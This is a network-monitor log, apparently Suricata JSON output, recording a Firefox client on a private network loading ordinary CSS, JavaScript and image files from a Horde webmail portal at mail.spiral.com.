{"timestamp":"2020-02-29T00:24:57.185061+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":140}} {"timestamp":"2020-02-29T00:24:57.188596+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/turba\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":147,"tx_id":0}} {"timestamp":"2020-02-29T00:24:57.188909+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/js\/minisearch.js?v=bdffa700049748b9e0ede1748b17c142","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":569}} {"timestamp":"2020-02-29T00:24:57.190628+0000","flow_id":1124614358556355,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53130,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/date\/en-US.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2297}} {"timestamp":"2020-02-29T00:24:57.191480+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":196},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":315,"tx_id":0}} {"timestamp":"2020-02-29T00:24:57.189049+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53124,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":201},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":488,"tx_id":0}} {"timestamp":"2020-02-29T00:24:57.189253+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53126,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":199,"tx_id":0}} {"timestamp":"2020-02-29T00:24:57.189640+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53124,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/hordeblocks.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":306}} {"timestamp":"2020-02-29T00:24:57.189715+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/popup.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1110}} {"timestamp":"2020-02-29T00:24:57.191693+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53126,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/popup.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1110},"app_proto":"http","fileinfo":{"filename":"\/js\/popup.js","state":"CLOSED","stored":false,"size":2903,"tx_id":1}} {"timestamp":"2020-02-29T00:24:57.193072+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/growler.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2538}} {"timestamp":"2020-02-29T00:24:57.193016+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/tooltips.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":947}} {"timestamp":"2020-02-29T00:24:57.197940+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/js\/minisearch.js?v=bdffa700049748b9e0ede1748b17c142","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":569},"app_proto":"http","fileinfo":{"filename":"\/turba\/js\/minisearch.js","state":"CLOSED","stored":false,"size":1408,"tx_id":1}} {"timestamp":"2020-02-29T00:24:57.198362+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/tooltips.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":947},"app_proto":"http","fileinfo":{"filename":"\/js\/tooltips.js","state":"CLOSED","stored":false,"size":2555,"tx_id":1}} {"timestamp":"2020-02-29T00:24:57.194052+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53124,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/hordeblocks.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":306},"app_proto":"http","fileinfo":{"filename":"\/js\/hordeblocks.js","state":"CLOSED","stored":false,"size":528,"tx_id":1}} {"timestamp":"2020-02-29T00:24:57.194394+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53124,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/topbar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1180}} {"timestamp":"2020-02-29T00:24:57.199683+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53126,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/growler.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2538},"app_proto":"http","fileinfo":{"filename":"\/js\/growler.js","state":"CLOSED","stored":false,"size":8911,"tx_id":2}} {"timestamp":"2020-02-29T00:24:57.202349+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53120,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":140},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":222,"tx_id":2}} {"timestamp":"2020-02-29T00:24:57.235669+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/date\/date.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17641}} {"timestamp":"2020-02-29T00:24:57.236618+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/date\/date.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17641},"app_proto":"http","fileinfo":{"filename":"\/js\/date\/date.js","state":"CLOSED","stored":false,"size":85570,"tx_id":2}} {"timestamp":"2020-02-29T00:24:57.237983+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/head-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} {"timestamp":"2020-02-29T00:24:57.238364+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/head-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/head-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":3}} {"timestamp":"2020-02-29T00:24:57.238682+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2337}} {"timestamp":"2020-02-29T00:24:57.239649+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/effects.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8721}} {"timestamp":"2020-02-29T00:24:57.241182+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/sound.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":974}} {"timestamp":"2020-02-29T00:24:57.241917+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/effects.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8721},"app_proto":"http","fileinfo":{"filename":"\/js\/scriptaculous\/effects.js","state":"CLOSED","stored":false,"size":38450,"tx_id":2}} {"timestamp":"2020-02-29T00:24:57.245147+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/hordecore.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6117}} {"timestamp":"2020-02-29T00:24:57.244833+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2337},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/logo.png","state":"CLOSED","stored":false,"size":2337,"tx_id":4}} {"timestamp":"2020-02-29T00:24:57.248170+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":423}} {"timestamp":"2020-02-29T00:24:57.248640+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":423},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/settings.png","state":"CLOSED","stored":false,"size":423,"tx_id":5}} {"timestamp":"2020-02-29T00:24:57.254870+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logout.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":674}} {"timestamp":"2020-02-29T00:24:57.255390+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logout.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":674},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/logout.png","state":"CLOSED","stored":false,"size":674,"tx_id":6}} {"timestamp":"2020-02-29T00:24:57.256235+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":116}} {"timestamp":"2020-02-29T00:24:57.256649+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":116},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-new-bg.png","state":"CLOSED","stored":false,"size":116,"tx_id":7}} {"timestamp":"2020-02-29T00:24:57.256868+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-normal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":221}} {"timestamp":"2020-02-29T00:24:57.259722+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-normal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":221},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-arrow-normal.png","state":"CLOSED","stored":false,"size":221,"tx_id":3}} {"timestamp":"2020-02-29T00:24:57.260421+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":436}} {"timestamp":"2020-02-29T00:24:57.260590+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tabset.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":105}} {"timestamp":"2020-02-29T00:24:57.261079+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":436},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-new.png","state":"CLOSED","stored":false,"size":436,"tx_id":8}} {"timestamp":"2020-02-29T00:24:57.262825+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tabset.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":105},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tabset.png","state":"CLOSED","stored":false,"size":105,"tx_id":4}} {"timestamp":"2020-02-29T00:24:57.305271+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/blacklist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":558}} {"timestamp":"2020-02-29T00:24:57.305309+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/whitelist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":546}} {"timestamp":"2020-02-29T00:24:57.393839+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/whitelist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":546},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/graphics\/whitelist.png","state":"CLOSED","stored":false,"size":546,"tx_id":9}} {"timestamp":"2020-02-29T00:24:57.394706+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/message.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":493}} 